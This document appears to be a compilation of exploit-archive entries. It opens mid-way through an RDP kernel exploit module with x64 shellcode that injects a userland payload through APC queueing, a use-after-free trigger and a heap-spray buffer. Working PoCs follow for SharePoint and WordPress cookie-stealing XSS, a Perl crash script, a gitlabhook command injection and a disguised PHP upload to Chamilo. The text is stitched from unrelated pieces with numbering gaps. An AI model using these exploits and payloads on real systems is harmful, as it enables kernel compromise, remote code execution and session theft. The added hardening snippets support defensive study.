           ; Note: APC routine does not require non-NULL TEB.ActivationContextStackPointer.
           ; from my observation, KTRHEAD.Queue is always NULL when TEB.ActivationContextStackPointer is NULL.
           ; Teb member is next to Queue member.
           mov edi, #{psgetthreadteb_hash}
           call get_proc_addr
           mov eax, dword [rax+3]  ; get offset from code (offset of Teb is always > 0x7f)
           cmp qword [rdx+rax-8], 0    ; KTHREAD.Queue MUST not be NULL
           je _insert_queue_apc_loop

           ; KeInitializeApc(PKAPC,
           ;                 PKTHREAD,
           ;                 KAPC_ENVIRONMENT = OriginalApcEnvironment (0),
           ;                 PKKERNEL_ROUTINE = kernel_apc_routine,
           ;                 PKRUNDOWN_ROUTINE = NULL,
           ;                 PKNORMAL_ROUTINE = userland_shellcode,
           ;                 KPROCESSOR_MODE = UserMode (1),
           ;                 PVOID Context);
           lea rcx, [rbp+#{data_kapc_offset}]     ; PAKC
           xor r8, r8      ; OriginalApcEnvironment
           lea r9, [rel kernel_kapc_routine]    ; KernelApcRoutine
           push rbp    ; context
           push 1      ; UserMode
           push rbp    ; userland shellcode (MUST NOT be NULL)
           push r8     ; NULL
           sub rsp, 0x20   ; shadow stack
           mov edi, #{keinitializeapc_hash}
           call win_api_direct
           ; Note: KeInsertQueueApc() requires shadow stack. Adjust stack back later

           ; BOOLEAN KeInsertQueueApc(PKAPC, SystemArgument1, SystemArgument2, 0);
           ;   SystemArgument1 is second argument in usermode code (rdx)
           ;   SystemArgument2 is third argument in usermode code (r8)
           lea rcx, [rbp+#{data_kapc_offset}]
           ;xor edx, edx   ; no need to set it here
           ;xor r8, r8     ; no need to set it here
           xor r9, r9
           mov edi, #{keinsertqueueapc_hash}
           call win_api_direct
           add rsp, 0x40
           ; if insertion failed, try next thread
           test eax, eax
           jz _insert_queue_apc_loop

           mov rax, [rbp+#{data_kapc_offset}+0x10]     ; get KAPC.ApcListEntry
           ; EPROCESS pointer 8 bytes
           ; InProgressFlags 1 byte
           ; KernelApcPending 1 byte
           ; if success, UserApcPending MUST be 1
           cmp byte [rax+0x1a], 1
           je _insert_queue_apc_done

           ; manual remove list without lock
           mov [rax], rax
           mov [rax+8], rax
           jmp _insert_queue_apc_loop

         _insert_queue_apc_done:
           ; The PEB address is needed in kernel_apc_routine. Setting QUEUEING_KAPC to 0 should be in kernel_apc_routine.

         _r3_to_r0_done:
           pop rax
           pop rbx
           pop rsi
           pop rdi
           pop r14
           pop r15
           ret

         ;========================================================================
         ; Call function in specific module
         ;
         ; All function arguments are passed as calling normal function with extra register arguments
         ; Extra Arguments: r15 = module pointer
         ;                  edi = hash of target function name
         ;========================================================================
         win_api_direct:
           call get_proc_addr
           jmp rax

         ;========================================================================
         ; Get function address in specific module
         ;
         ; Arguments: r15 = module pointer
         ;            edi = hash of target function name
         ; Return: eax = offset
         ;========================================================================
         get_proc_addr:
           ; Save registers
           push rbx
           push rcx
           push rsi                ; for using calc_hash

           ; use rax to find EAT
           mov eax, dword [r15+60]  ; Get PE header e_lfanew
           mov eax, dword [r15+rax+136] ; Get export tables RVA
           add rax, r15
           push rax                ; save EAT

           mov ecx, dword [rax+24]  ; NumberOfFunctions
           mov ebx, dword [rax+32]  ; FunctionNames
           add rbx, r15

         _get_proc_addr_get_next_func:
           ; When we reach the start of the EAT (we search backwards), we hang or crash
           dec ecx                     ; decrement NumberOfFunctions
           mov esi, dword [rbx+rcx*4]  ; Get rva of next module name
           add rsi, r15                ; Add the modules base address

           call calc_hash

           cmp eax, edi                        ; Compare the hashes
           jnz _get_proc_addr_get_next_func    ; try the next function

         _get_proc_addr_finish:
           pop rax                     ; restore EAT
           mov ebx, dword [rax+36]
           add rbx, r15                ; ordinate table virtual address
           mov cx, word [rbx+rcx*2]    ; desired functions ordinal
           mov ebx, dword [rax+28]     ; Get the function addresses table rva
           add rbx, r15                ; Add the modules base address
           mov eax, dword [rbx+rcx*4]  ; Get the desired functions RVA
           add rax, r15                ; Add the modules base address to get the functions actual VA

           pop rsi
           pop rcx
           pop rbx
           ret

         ;========================================================================
         ; Calculate ASCII string hash. Useful for comparing ASCII string in shellcode.
         ;
         ; Argument: rsi = string to hash
         ; Clobber: rsi
         ; Return: eax = hash
         ;========================================================================
         calc_hash:
           push rdx
           xor eax, eax
           cdq
         _calc_hash_loop:
           lodsb                   ; Read in the next byte of the ASCII string
           ror edx, 13             ; Rotate right our hash value
           add edx, eax            ; Add the next byte of the string
           test eax, eax           ; Stop when found NULL
           jne _calc_hash_loop
           xchg edx, eax
           pop rdx
           ret

           ; KernelApcRoutine is called when IRQL is APC_LEVEL in (queued) Process context.
           ; But the IRQL is simply raised from PASSIVE_LEVEL in KiCheckForKernelApcDelivery().
           ; Moreover, there is no lock when calling KernelApcRoutine.
           ; So KernelApcRoutine can simply lower the IRQL by setting cr8 register.
           ;
           ; VOID KernelApcRoutine(
           ;           IN PKAPC Apc,
           ;           IN PKNORMAL_ROUTINE *NormalRoutine,
           ;           IN PVOID *NormalContext,
           ;           IN PVOID *SystemArgument1,
           ;           IN PVOID *SystemArgument2)
         kernel_kapc_routine:
           push rbp
           push rbx
           push rdi
           push rsi
           push r15

           mov rbp, [r8]       ; *NormalContext is our data area pointer

           mov r15, [rbp+#{data_nt_kernel_addr_offset}]
           push rdx
           pop rsi     ; mov rsi, rdx
           mov rbx, r9

           ;======================================
           ; ZwAllocateVirtualMemory(-1, &baseAddr, 0, &0x1000, 0x1000, 0x40)
           ;======================================
           xor eax, eax
           mov cr8, rax    ; set IRQL to PASSIVE_LEVEL (ZwAllocateVirtualMemory() requires)

           ; rdx is already address of baseAddr
           mov [rdx], rax      ; baseAddr = 0

           mov ecx, eax
           not rcx             ; ProcessHandle = -1
           mov r8, rax         ; ZeroBits
           mov al, 0x40    ; eax = 0x40
           push rax            ; PAGE_EXECUTE_READWRITE = 0x40
           shl eax, 6          ; eax = 0x40 << 6 = 0x1000
           push rax            ; MEM_COMMIT = 0x1000
           ; reuse r9 for address of RegionSize
           mov [r9], rax       ; RegionSize = 0x1000
           sub rsp, 0x20   ; shadow stack
           mov edi, #{zwallocatevirtualmemory_hash}
           call win_api_direct
           add rsp, 0x30

           ; check error
           test eax, eax
           jnz _kernel_kapc_routine_exit

           ;======================================
           ; copy userland payload
           ;======================================
           mov rdi, [rsi]

           ;--------------------------- HACK IN EGG USER ---------
           push rdi
           lea rsi, [rel shellcode_start]
           mov rdi, 0x#{USERMODE_EGG.to_s(16)}
         _find_user_egg_loop:
           sub rsi, 0x#{CHUNK_SIZE.to_s(16)}
           mov rax, [rsi - 8]
           cmp rax, rdi
           jnz _find_user_egg_loop
         _inner_find_user_egg_loop:
           inc rsi
           mov rax, [rsi - 8]
           cmp rax, rdi
           jnz _inner_find_user_egg_loop
           pop rdi
           ;--------------------------- END HACK EGG USER ------------

           mov ecx, 0x380  ; fix payload size to 0x380 bytes
           rep movsb

           ;======================================
           ; find CreateThread address (in kernel32.dll)
           ;======================================
           mov rax, [rbp+#{data_peb_addr_offset}]
           mov rax, [rax + 0x18]       ; PEB->Ldr
           mov rax, [rax + 0x20]       ; InMemoryOrder list
           ;lea rsi, [rcx + rdx]    ; rsi = ThreadListHead address
           ;mov rbx, rsi    ; use rbx for iterating thread
         _find_kernel32_dll_loop:
           mov rax, [rax]       ; first one always be executable
           ; offset 0x38 (WORD)  => must be 0x40 (full name len c:\windows\system32\kernel32.dll)
           ; offset 0x48 (WORD)  => must be 0x18 (name len kernel32.dll)
           ; offset 0x50  => is name
           ; offset 0x20  => is dllbase
           ;cmp word [rax+0x38], 0x40
           ;jne _find_kernel32_dll_loop
           cmp word [rax+0x48], 0x18
           jne _find_kernel32_dll_loop

           mov rdx, [rax+0x50]
           ; check only "32" because name might be lowercase or uppercase
           cmp dword [rdx+0xc], 0x00320033   ; 3\x002\x00
           jnz _find_kernel32_dll_loop
           ;int3
           mov r15, [rax+0x20]
           mov edi, #{createthread_hash}
           call get_proc_addr
           ; save CreateThread address to SystemArgument1
           mov [rbx], rax

         _kernel_kapc_routine_exit:
           xor ecx, ecx
           ; clear queueing kapc flag, allow other hijacked system call to run shellcode
           mov byte [rbp+#{data_queueing_kapc_offset}], cl
           ; restore IRQL to APC_LEVEL
           mov cl, 1
           mov cr8, rcx
           pop r15
           pop rsi
           pop rdi
           pop rbx
           pop rbp
           ret

         userland_start_thread:
           ; CreateThread(NULL, 0, &threadstart, NULL, 0, NULL)
           xchg rdx, rax   ; rdx is CreateThread address passed from kernel
           xor ecx, ecx    ; lpThreadAttributes = NULL
           push rcx        ; lpThreadId = NULL
           push rcx        ; dwCreationFlags = 0
           mov r9, rcx     ; lpParameter = NULL
           lea r8, [rel userland_payload]    ; lpStartAddr
           mov edx, ecx    ; dwStackSize = 0
           sub rsp, 0x20
           call rax
           add rsp, 0x30
           ret

         userland_payload:
         ^

         [
           KERNELMODE_EGG,
           assemble_with_fixups(asm)
         ].pack('<Qa*')
       end

       def create_free_trigger(chan_user_id, chan_id)
         # malformed Disconnect Provider Indication PDU (opcode: 0x2, total_size != 0x20)
         vprint_status("Creating free trigger for user #{chan_user_id} on channel #{chan_id}")

         # The extra bytes on the end of the body is what causes the bad things to happen
         body = "\x00\x00\x00\x00\x00\x00\x00\x00\x02" + "\x00" * 22
         rdp_create_channel_msg(chan_user_id, chan_id, body, 3, 0xFFFFFFF)
       end

       def create_exploit_channel_buffer(target_addr)
         overspray_addr = target_addr + 0x2000
         shellcode_vtbl = target_addr + HEADER_SIZE
         magic_value1 = overspray_addr + 0x810
         magic_value2 = overspray_addr + 0x48
         magic_value3 = overspray_addr + CHUNK_SIZE + HEADER_SIZE

         # first 0x38 bytes are used by DATA PDU packet
         # exploit channel starts at +0x38, which is +0x20 of an _ERESOURCE
         # http://www.tssc.de/winint/Win10_17134_ntoskrnl/_ERESOURCE.htm
         [
           [
             # SystemResourceList (2 pointers, each 8 bytes)
             # Pointer to OWNER_ENTRY (8 bytes)
             # ActiveCount (SHORT, 2 bytes)
             # Flag (WORD, 2 bytes)
             # Padding (BYTE[4], 4 bytes) x64 only
             0x0,             # SharedWaters (Pointer to KSEMAPHORE, 8 bytes)
             0x0,             # ExclusiveWaiters (Pointer to KSEVENT, 8 bytes)
             magic_value2,    # OwnerThread (ULONG, 8 bytes)
             magic_value2,    # TableSize (ULONG, 8 bytes)
             0x0,             # ActiveEntries (DWORD, 4 bytes)
             0x0,             # ContenttionCount (DWORD, 4 bytes)
             0x0,             # NumberOfSharedWaiters (DWORD, 4 bytes)
             0x0,             # NumberOfExclusiveWaiters (DWORD, 4 bytes)
             0x0,             # Reserved2 (PVOID, 8 bytes) x64 only
             magic_value2,    # Address (PVOID, 8 bytes)
             0x0,             # SpinLock (UINT_PTR, 8 bytes)
           ].pack('<Q<Q<Q<Q<L<L<L<L<Q<Q<Q'),
           [
             magic_value2,    # SystemResourceList (2 pointers, each 8 bytes)
             magic_value2,    # --------------------
             0x0,             # Pointer to OWNER_ENTRY (8 bytes)
             0x0,             # ActiveCount (SHORT, 2 bytes)
             0x0,             # Flag (WORD, 2 bytes)
             0x0,
# Padding (BYTE[4], 4 bytes) x64 only 0x0, # SharedWaters (Pointer to KSEMAPHORE, 8 bytes) 0x0, # ExclusiveWaiters (Pointer to KSEVENT, 8 bytes) magic_value2, # OwnerThread (ULONG, 8 bytes) magic_value2, # TableSize (ULONG, 8 bytes) 0x0, # ActiveEntries (DWORD, 4 bytes) 0x0, # ContenttionCount (DWORD, 4 bytes) 0x0, # NumberOfSharedWaiters (DWORD, 4 bytes) 0x0, # NumberOfExclusiveWaiters (DWORD, 4 bytes) 0x0, # Reserved2 (PVOID, 8 bytes) x64 only magic_value2, # Address (PVOID, 8 bytes) 0x0, # SpinLock (UINT_PTR, 8 bytes) ].pack('<Q<Q<Q<S<S<L<Q<Q<Q<Q<L<L<L<L<Q<Q<Q'), [ 0x1F, # ClassOffset (DWORD, 4 bytes) 0x0, # bindStatus (DWORD, 4 bytes) 0x72, # lockCount1 (QWORD, 8 bytes) magic_value3, # connection (QWORD, 8 bytes) shellcode_vtbl, # shellcode vtbl ? (QWORD, 8 bytes) 0x5, # channelClass (DWORD, 4 bytes) "MS_T120\x00".encode('ASCII'), # channelName (BYTE[8], 8 bytes) 0x1F, # channelIndex (DWORD, 4 bytes) magic_value1, # channels (QWORD, 8 bytes) magic_value1, # connChannelsAddr (POINTER, 8 bytes) magic_value1, # list1 (QWORD, 8 bytes) magic_value1, # list1 (QWORD, 8 bytes) magic_value1, # list2 (QWORD, 8 bytes) magic_value1, # list2 (QWORD, 8 bytes) 0x65756c62, # inputBufferLen (DWORD, 4 bytes) 0x7065656b, # inputBufferLen (DWORD, 4 bytes) magic_value1, # connResrouce (QWORD, 8 bytes) 0x65756c62, # lockCount158 (DWORD, 4 bytes) 0x7065656b, # dword15C (DWORD, 4 bytes) ].pack('<L<L<Q<Q<Q<La*<L<Q<Q<Q<Q<Q<Q<L<L<Q<L<L') ].join('') end end
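An added example, written for this page and not part of the Metasploit module quoted above: a Python model of the calc_hash routine (rotate-right-13 over every byte including the NUL) and of the hash-based export lookup that get_proc_addr performs with it, plus the BaseDllName test the shellcode uses to pick kernel32.dll out of the loader list. The export table and its addresses are constructed for the demo, not real ntoskrnl or kernel32 values.

```python
from typing import Dict, Optional

MASK32 = 0xFFFFFFFF


def ror32(value: int, count: int) -> int:
    """32-bit rotate right, the same operation as `ror edx, 13`."""
    count %= 32
    return ((value >> count) | (value << (32 - count))) & MASK32


def calc_hash(name: bytes) -> int:
    """Mirror of calc_hash in the shellcode.

    edx starts at 0 (cdq with eax = 0). For every byte, including the
    terminating NUL, the hash is rotated right by 13 and the byte is added;
    the loop only exits after the NUL has been processed, so the NUL
    contributes one extra rotate. The appended b"\\x00" reproduces that.
    """
    h = 0
    for b in name + b"\x00":
        h = (ror32(h, 13) + b) & MASK32
    return h


def resolve_by_hash(exports: Dict[bytes, int], wanted: int) -> Optional[int]:
    """What get_proc_addr does over a real export table: hash every exported
    name and return the address of the first one that matches."""
    for name, addr in exports.items():
        if calc_hash(name) == wanted:
            return addr
    return None


def find_collisions(names):
    """Two exports with the same hash make the lookup ambiguous; a shellcode
    author should run this over the real export list before trusting it."""
    seen = {}
    collisions = []
    for n in names:
        h = calc_hash(n)
        if h in seen and seen[h] != n:
            collisions.append((seen[h], n))
        seen.setdefault(h, n)
    return collisions


def is_kernel32_entry(base_name_len: int, base_name_utf16: bytes) -> bool:
    """The loader-list test from the shellcode: BaseDllName.Length must be
    0x18 bytes ("kernel32.dll" as UTF-16) and the two UTF-16 characters at
    byte offset 0xc must be "32", which sidesteps upper/lower case."""
    return base_name_len == 0x18 and base_name_utf16[0xC:0x10] == b"3\x002\x00"


# Constructed export table with hypothetical addresses (not real ones).
SAMPLE_EXPORTS = {
    b"ZwAllocateVirtualMemory": 0xFFFFF80000401000,
    b"ExAllocatePoolWithTag": 0xFFFFF80000402000,
    b"CreateThread": 0x00007FF800010000,
}

if __name__ == "__main__":
    for n, a in SAMPLE_EXPORTS.items():
        print(f"{n.decode():26s} hash=0x{calc_hash(n):08x} -> 0x{a:x}")
    print("collisions:", find_collisions(SAMPLE_EXPORTS))
```

The same function produces the `#{zwallocatevirtualmemory_hash}` and `#{createthread_hash}` constants the module interpolates into the assembly, provided it is fed the exact exported name; the collision check is the step worth keeping around when a hash is reused against a different build of the DLL.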
3. # Exploit Title: Microsoft SharePoint 2013 SP1 - 'DestinationFolder' Persistent Cross-Site Scripting
# Author: Davide Cioccia
# Discovery Date: 2019-09-25
# Vendor Homepage: https://www.microsoft.com
# Software Link: https://support.microsoft.com/en-us/help/2880552/description-of-microsoft-sharepoint-server-2013-service-pack-1-sp1
# Tested Version: SP1
# Tested on: Microsoft Windows Server 2016
# CVE: CVE-2019-1262
# Advisory ID: ZSL-2019-5533
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5533.php
# MSRC: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1262

Vendor: Microsoft Corporation
Product web page: https://www.microsoft.com
Affected version: 2013 SP1

Summary: SharePoint is a web-based collaborative platform that integrates with Microsoft Office. Launched in 2001, SharePoint is primarily sold as a document management and storage system, but the product is highly configurable and usage varies substantially among organizations.

Desc: A cross-site scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server. An authenticated attacker could exploit the vulnerability by sending a specially crafted request to an affected SharePoint server. The attacker who successfully exploited the vulnerability could then perform cross-site scripting attacks on affected systems and run script in the security context of the current user. The attacks could allow the attacker to read content that the attacker is not authorized to read, use the victim's identity to take actions on the SharePoint site on behalf of the user, such as change permissions and delete content, and inject malicious content in the browser of the user.

SharePoint 2013 SP1 allows users to upload files to the platform, but does not correctly sanitize the filename when the files are listed. An authenticated user that has the rights to upload files to the SharePoint platform is able to exploit a stored cross-site scripting vulnerability in the filename. The filename is reflected in the attribute 'aria-label' of the following HTML tag.

# PoC request:

POST /FOLDER/_layouts/15/Upload.aspx?List={689D112C-BDAA-4B05-B0CB-0DFB36CF0649}&RootFolder=&IsDlg=1 HTTP/1.1
Host: vulnerable_sharepoint_2013
Connection: close
Content-Length: 31337
Cache-Control: max-age=0
Authorization: Negotiate YIIV9gYGKwYBBQUCo........................JBAq39IdJh3yphI1uHbz/jbQ==
Origin: https://vulnerable_sharepoint_2013.tld
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryewNI1MC6qaHDB50n
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Sec-Fetch-Mode: nested-navigate
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Sec-Fetch-Site: same-origin
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,it-IT;q=0.8,it;q=0.7,nl;q=0.6
Cookie: ...

------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOWebPartPage_PostbackSource"


------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOTlPn_SelectedWpId"


------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOTlPn_View"

0
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOTlPn_ShowSettings"

False
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOGallery_SelectedLibrary"


------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOGallery_FilterString"


------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOTlPn_Button"

none
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="__EVENTTARGET"

ctl00$PlaceHolderMain$ctl00$RptControls$btnOK
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="__EVENTARGUMENT"


------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOSPWebPartManager_DisplayModeName"

Browse
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOSPWebPartManager_ExitingDesignMode"

false
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOWebPartPage_Shared"


------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOLayout_LayoutChanges"


------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOLayout_InDesignMode"


------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOSPWebPartManager_OldDisplayModeName"

Browse
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOSPWebPartManager_StartWebPartEditingName"

false
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOSPWebPartManager_EndWebPartEditing"

false
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="_maintainWorkspaceScrollPosition"

0
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="__REQUESTDIGEST"

[DIGEST]
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="__VIEWSTATE"

[VIEWSTATE]
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="__VIEWSTATEGENERATOR"

E6912F23
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="__SCROLLPOSITIONX"

0
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="__SCROLLPOSITIONY"

0
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="__EVENTVALIDATION"


------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="destination"

[DESTINATION_FOLDER]
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="ctl00$PlaceHolderMain$ctl01$ctl04$InputFile"; filename="' onmouseover=alert(document.cookie) '.jpg"
Content-Type: image/jpeg

ZSL
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="ctl00$PlaceHolderMain$ctl01$ctl04$OverwriteSingle"

on
------WebKitFormBoundaryewNI1MC6qaHDB50n--
4. # Exploit Title: SpotIE Internet Explorer Password Recovery 2.9.5 - 'Key' Denial of Service
# Date: 2019-20-09
# Exploit Author: Emilio Revelo
# Vendor Homepage: http://www.nsauditor.com/
# Software Link : http://www.nsauditor.com/downloads/spotie_setup.exe
# Tested on: Windows 10 Pro x64 es
# Version: 2.9.5

# Steps to produce the DoS:
# 1.- Run perl script : perl SpotIE.pl
# 2.- Open SpotIE.txt and copy the content to clipboard
# 3.- Open SpotIE Internet Explorer Password Recovery
# 4.- Navigate to Register -> Enter the registration name and key below...
# 5.- Paste ClipBoard on "Key:"
# 7.- Ok
# 8.- Observe the program crash.

#!/usr/local/bin/perl
use strict;
use warnings;

my $filename = 'SpotIE.txt';
open(my $fh, '>', $filename) or die "Could not open file '$filename' $!";
print $fh "E"x256;
close $fh;
print "Done!\n";
print "File: SpotIE.txt\n";
5. # Exploit Title: WP Server Log Viewer 1.0 - 'logfile' Persistent Cross-Site Scripting
# Date: 2019-09-10
# Exploit Author: strider
# Software Link: https://github.com/anttiviljami/wp-server-log-viewer
# Version: 1.0
# Tested on: Debian 10 Buster x64 / Kali Linux
# CVE : None

====================================[Description]====================================
This plugin allows you to add logfiles via wp-admin. The problem here is that the file paths are stored unfiltered/unescaped. This gives the possibility of a persistent XSS attack.

====================================[Codepart]====================================
if( isset( $_GET['action'] ) && 'new' === $_GET['action'] && isset( $_GET['logpath'] ) ) {
    // new log was added
    $logs = get_option( 'server_logs' );
    if( is_null( $logs ) ) {
        $logs = [];
    }
    $log = trim( $_GET['logpath'] ); //only trimmed string no escaping
    $logs[] = $log; //here the log will be added without security checks
    $logs = array_values( $logs );
    $index = array_search( $log, $logs );
    update_option( 'server_logs', $logs );
    wp_safe_redirect( admin_url('tools.php?page=wp-server-log-viewer&log=' . $index) );
}

====================================[Proof of Concept]====================================
Add a new log file to the plugin. Paste this exploit into the form and submit it.

<img src=# onerror=alert(document.cookie);>log.txt

It tries to render an image, triggers the onerror event and prints the cookie. In the tab you see the log.txt.
6. # Exploit Title: NPMJS gitlabhook 0.0.17 - 'repository' Remote Command Execution
# Date: 2019-09-13
# Exploit Author: Semen Alexandrovich Lyhin
# Vendor Homepage: https://www.npmjs.com/package/gitlabhook
# Version: 0.0.17
# Tested on: Kali Linux 2, Windows 10.
# CVE : CVE-2019-5485

#!/usr/bin/python
import requests

target = "http://TARGET:3420"
cmd = r"touch /tmp/poc.txt"
# repository.name ends up inside a shell command line; the quote and the
# semicolons close the original argument and append our command
body = '{"repository":{"name": "Diasporrra\'; %s;\'"}}' % cmd
r = requests.post(target, data=body)
print("Done.")
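An added example, not code from the gitlabhook package: it shows what happens to the repository name from the PoC body once it reaches a shell, next to two ways of passing it that keep it a single argument. The `cd ... && git pull` wrapper is a stand-in for whatever command the hook really builds; the package's actual command line is not reproduced here.

```python
import json
import shlex

# Constructed values: the name from the PoC above, and the JSON body that carries it.
PAYLOAD_NAME = "Diasporrra'; touch /tmp/poc.txt;'"
POC_BODY = '{"repository":{"name": "' + PAYLOAD_NAME + '"}}'


def repo_name_from_webhook(body: str) -> str:
    """JSON parsing keeps the quote and semicolons intact, so they reach
    whatever the hook does with the name verbatim."""
    return json.loads(body)["repository"]["name"]


def build_shell_command_unsafe(repo_name: str) -> str:
    """Vulnerable pattern: interpolate the name into a single-quoted argument
    of a command line that is later handed to /bin/sh."""
    return f"cd /var/repos/'{repo_name}' && git pull"


def build_shell_command_quoted(repo_name: str) -> str:
    """Hardened string form: shlex.quote turns the whole name into one word,
    whatever quotes or metacharacters it contains."""
    return f"cd /var/repos/{shlex.quote(repo_name)} && git pull"


def build_argv(repo_name: str) -> list:
    """Preferred form: no shell at all, the name is a single argv element
    (run with subprocess.run(argv) rather than shell=True)."""
    return ["git", "-C", f"/var/repos/{repo_name}", "pull"]


def commands_seen_by_shell(cmdline: str) -> list:
    """Tokenise like a POSIX shell (quotes honoured; ; && || | & separate
    commands) and return the simple commands the shell would run."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    commands, current = [], []
    for tok in lexer:
        if tok in (";", "&&", "||", "|", "&"):
            if current:
                commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


if __name__ == "__main__":
    name = repo_name_from_webhook(POC_BODY)
    for label, line in (("unsafe", build_shell_command_unsafe(name)),
                        ("quoted", build_shell_command_quoted(name))):
        print(label, "->", commands_seen_by_shell(line))
    print("argv  ->", build_argv(name))
```

With the unsafe builder the shell sees `touch /tmp/poc.txt` as its own command between the `cd` and the `git pull`; with `shlex.quote` or an argv list the whole payload string stays inside the path argument and nothing extra runs.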
7. # Exploit Title: Chamilo LMS 1.11.8 - Arbitrary File Upload
# Google Dork: "powered by chamilo"
# Date: 2018-10-05
# Exploit Author: Sohel Yousef jellyfish security team
# Software Link: https://chamilo.org/en/download/
# Version: Chamilo 1.11.8 or lower to 1.8
# Category: webapps

# 1. Description
# Any registered user can upload files and rename and change the file type to
# php5 or php7 by ckeditor module in my files section

# register here :
# http://localhost/chamilo//main/auth/inscription.php
# after registration you can view these sections
# http://localhost/chamilo/main/social/myfiles.php
# http://localhost/chamilo/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0
# upload your shell in gif format and then rename the format
# if the rename function was disabled, add this GIF89;aGIF89;aGIF89;a before <?PHP
# to be like this for example

GIF89;aGIF89;aGIF89;a<html>
<head>
<title>PHP Test</title>
<form action="" method="post" enctype="multipart/form-data">
<input type="file" name="fileToUpload" id="fileToUpload">
<input type="submit" value="upload file" name="submit">
</form>
</head>
<body>
<?php
echo '<p>FILE UPLOAD</p><br>';
$tgt_dir = "uploads/";
$tgt_file = $tgt_dir.basename($_FILES['fileToUpload']['name']);
echo "<br>TARGET FILE= ".$tgt_file;
//$filename = $_FILES['fileToUpload']['name'];
echo "<br>FILE NAME FROM VARIABLE:- ".$_FILES["fileToUpload"]["name"];
if(isset($_POST['submit'])) {
    if(file_exists("uploads/".$_FILES["fileToUpload"]["name"])) {
        echo "<br>file exists, try with another name";
    } else {
        echo "<br>STARTING UPLOAD PROCESS<br>";
        if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $tgt_file)) {
            echo "<br>File UPLOADED:- ".$tgt_file;
        } else {
            echo "<br>ERROR WHILE UPLOADING FILE<br>";
        }
    }
}
?>
</body>
</html>

# and upload it as php.gif
# you can browse the files from right click and click on browse option
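An added example, not Chamilo code: the upload gate the post defeats checks only file content for an image signature, so a file that begins with a GIF header and continues with PHP passes and is stored under the user's chosen name. The stricter gate beside it checks every suffix, requires the signature to agree with the extension, and refuses anything carrying a PHP open tag. The signature table and the executable-suffix list are assumptions about a typical PHP host, and the sample upload is constructed (a real "GIF89a" header is used rather than the post's "GIF89;a" text).

```python
import os

# Image signatures a naive sniffer might accept, mapped to a canonical extension.
IMAGE_SIGNATURES = {
    b"GIF87a": ".gif",
    b"GIF89a": ".gif",
    b"\x89PNG\r\n\x1a\n": ".png",
    b"\xff\xd8\xff": ".jpg",
}
ALLOWED_EXT = {".gif", ".png", ".jpg", ".jpeg"}
# Suffixes a PHP handler may execute; assumed server configuration.
EXECUTABLE_EXT = {".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar"}


def sniff_image(data: bytes):
    """Return the extension matching the leading magic bytes, or None."""
    for magic, ext in IMAGE_SIGNATURES.items():
        if data.startswith(magic):
            return ext
    return None


def weak_accept(filename: str, data: bytes) -> bool:
    """Content-only check, the kind a 'GIF89a' prefix defeats. The file is
    stored under the user's own name, so a later rename to .php5 or .php7
    (or a double extension) turns it into a script."""
    return sniff_image(data) is not None


def strict_accept(filename: str, data: bytes):
    """Return the canonical extension to store under, or None to reject.
    Rejects executable suffixes anywhere in the name (shell.php.gif),
    extensions outside the allowlist, signature/extension mismatches and
    any PHP open tag in the body. The caller should still generate its own
    file name rather than reuse the uploaded one."""
    parts = os.path.basename(filename).lower().split(".")
    if len(parts) < 2:
        return None
    if any("." + p in EXECUTABLE_EXT for p in parts[1:]):
        return None
    ext = "." + parts[-1]
    if ext not in ALLOWED_EXT:
        return None
    if ext == ".jpeg":
        ext = ".jpg"
    if sniff_image(data) != ext:
        return None
    if b"<?php" in data.lower() or b"<?=" in data:
        return None
    return ext


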